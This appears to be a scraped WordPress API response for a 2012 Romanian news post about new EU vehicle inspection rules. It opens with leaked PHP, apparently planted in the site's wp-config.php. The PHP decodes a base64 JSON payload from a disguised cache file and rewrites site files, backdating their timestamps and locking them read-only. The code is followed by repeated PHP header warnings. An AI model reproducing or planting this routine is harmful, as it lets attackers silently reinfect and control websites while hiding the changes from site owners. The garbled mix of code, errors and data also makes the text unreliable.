$wp_update_file="/home/shuffles/public_html/wp-includes/cache-reset.php"; $wp_update_file="/home/shuffles/public_html/wp-includes/cache-reset.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } }
Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794

Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/rest-api/class-wp-rest-server.php on line 1794
{"id":5832,"date":"2012-07-16T23:52:30","date_gmt":"2012-07-16T22:52:30","guid":{"rendered":"http:\/\/o9atitudine.ro\/?p=5832"},"modified":"2012-07-16T23:52:30","modified_gmt":"2012-07-16T22:52:30","slug":"infocons-reguli-mai-stricte-in-domeniul-inspectiei-automobilelor","status":"publish","type":"post","link":"http:\/\/o9atitudine.ro\/comunicate\/infocons-reguli-mai-stricte-in-domeniul-inspectiei-automobilelor\/","title":{"rendered":"InfoCons: Reguli mai stricte in domeniul Inspectiei Automobilelor"},"content":{"rendered":"

Pe soselele Europei isi pierd zilnic viata peste 5 persoane, in accidente cauzate de probleme de ordin tehnic.Din acest motiv, Comisia Europeana a adoptat noi reguli care inaspresc regimul de control si ii extind anvergura.<\/p>\n

Defectiunile tehnice constituie o cauza importanta a accidentelor,determinand 6% din totalul accidentelor de automobil, ceea ce inseamna anual 2 000 de decese si mult mai multe accidentari.In ceea ce priveste accidentele de motocicleta, 8% din totalul acestora sunt legate de defectiuni tehnice.<\/p>\n

Principala problema este aceea ca pe sosele exista prea multe vehicule cu probleme tehnice.Cateva studii recente elaborate in Regatul Unit si Germania indica faptul ca un procent de pana la 10% din autovehicule prezinta in orice moment o defectiune care le-ar impiedica sa treaca cu succes de controlul tehnic.In plus, conform regulilor actuale, multe defectiuni tehnice cu implicatii grave pentru securitate (cum ar fi ABS si controlul electronic al stabilitatii) nu sunt nici macar verificate.<\/p>\n

Normele UE in vigoare care stabilesc standardele minime pentru controlul vehiculelor dateaza din 1977, cu actualizari minore.De atunci, insa, automobilele, conduita soferilor si tehnologia au evoluat foarte mult.<\/p>\n

Obiectivul noilor propuneri este acela de a salva peste 1 200 de vieti anual si de a evita peste 36 000 de accidente cauzate de probleme de ordin tehnic.<\/p>\n

Vicepresedintele Siim Kallas, responsabil cu transporturile, a declarat in legatura cu acest subiect: \u201eDaca va aflati la volanul unei masini care nu indeplineste conditiile tehnice necesare pentru a circula, atunci reprezentati un pericol atat pentru dumneavoastra insiva, cat si pentru ceilalti pasageri din automobil \u2013 membri ai familiei, prieteni sau colegi de serviciu.\u00a0 Si, mai mult decat atat, ii puneti in primejdie si pe ceilalti participanti la trafic.Lucrurile sunt cat se poate de simple:nu dorim pe drumurile noastre masini care pot deveni letale.\u201d<\/p>\n

Printre principalele elemente ale noilor masuri propuse se numara urmatoarele:<\/p>\n

\u00b7\u00a0 Verificarea obligatorie a scuterelor si motocicletelor in intreaga UE.Motociclistii si conducatorii de scutere, in special cei tineri, reprezinta grupul de participanti la trafic cu cel mai mare risc.<\/p>\n

Cresterea frecventei inspectiilor tehnice periodice in cazul automobilelor vechi.In cazul automobilelor care au intre 5 si 6 ani, numarul accidentelor grave cauzate de defectiuni tehnice creste semnificativ (a se vedea graficul din MEMO\/12\/555).<\/p>\n

\u00b7\u00a0 Cresterea frecventei controalelor pentru autoturisme si camionete cu kilometraj foarte mare.Astfel, aceste tipuri de autovehicule vor face obiectul unor controale similare celor aplicate in cazul taxiurilor sau al ambulantelor, de exemplu.<\/p>\n

\u00b7\u00a0 Imbunatatirea calitatii controalelor prin stabilirea unor standarde minime comune in ceea ce priveste defectiunile, echipamentele si inspectorii.<\/p>\n

\u00b7\u00a0 Obligativitatea verificarii componentelor electronice de siguranta.<\/p>\n

\u00b7\u00a0 Combaterea manipularii kilometrajului prin inregistrarea kilometrilor parcursi.<\/p>\n

Sursa: Comisia Europeana<\/p>\n

Bruxelles, 13 iulie 2012<\/p>\n","protected":false},"excerpt":{"rendered":"

Pe soselele Europei isi pierd zilnic viata peste 5 persoane, in accidente cauzate de probleme de ordin tehnic.Din acest motiv, Comisia Europeana a adoptat noi reguli care inaspresc regimul de control si ii extind anvergura.<\/p>\n","protected":false},"author":8,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/posts\/5832"}],"collection":[{"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/comments?post=5832"}],"version-history":[{"count":1,"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/posts\/5832\/revisions"}],"predecessor-version":[{"id":5833,"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/posts\/5832\/revisions\/5833"}],"wp:attachment":[{"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/media?parent=5832"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/categories?post=5832"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/o9atitudine.ro\/wp-json\/wp\/v2\/tags?post=5832"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}